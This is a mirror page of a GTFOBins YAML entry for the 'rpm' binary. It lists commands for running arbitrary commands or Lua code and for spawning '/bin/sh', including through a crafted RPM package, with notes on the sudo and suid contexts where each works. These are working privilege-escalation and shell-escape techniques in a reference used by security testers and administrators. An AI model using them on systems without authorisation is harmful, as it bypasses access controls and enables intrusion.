mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 14:36:23 +01:00
450efe76d4
Rationale being that: - it's easy to just forget it; - entries that only have the unprivileged context are quite rare.
43 lines
839 B
Plaintext
43 lines
839 B
Plaintext
---
|
|
functions:
|
|
command:
|
|
- code: |-
|
|
rpm -ivh x-1.0-1.noarch.rpm
|
|
comment: |-
|
|
Generate the RPM package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.
|
|
|
|
```
|
|
echo /path/to/command >x.sh
|
|
fpm -n x -s dir -t rpm -a all --before-install x.sh .
|
|
```
|
|
contexts:
|
|
sudo:
|
|
inherit:
|
|
- code: |-
|
|
rpm --eval '%{lua:...}'
|
|
comment: |-
|
|
This allows to run Lua code (`...`).
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
from: lua
|
|
version: |-
|
|
Some older version is required.
|
|
shell:
|
|
- code: |-
|
|
rpm --eval '%(/bin/sh 1>&2)'
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
shell: true
|
|
unprivileged:
|
|
- code: |-
|
|
rpm --pipe '/bin/sh 0<&1'
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
shell: true
|
|
unprivileged:
|
|
...
|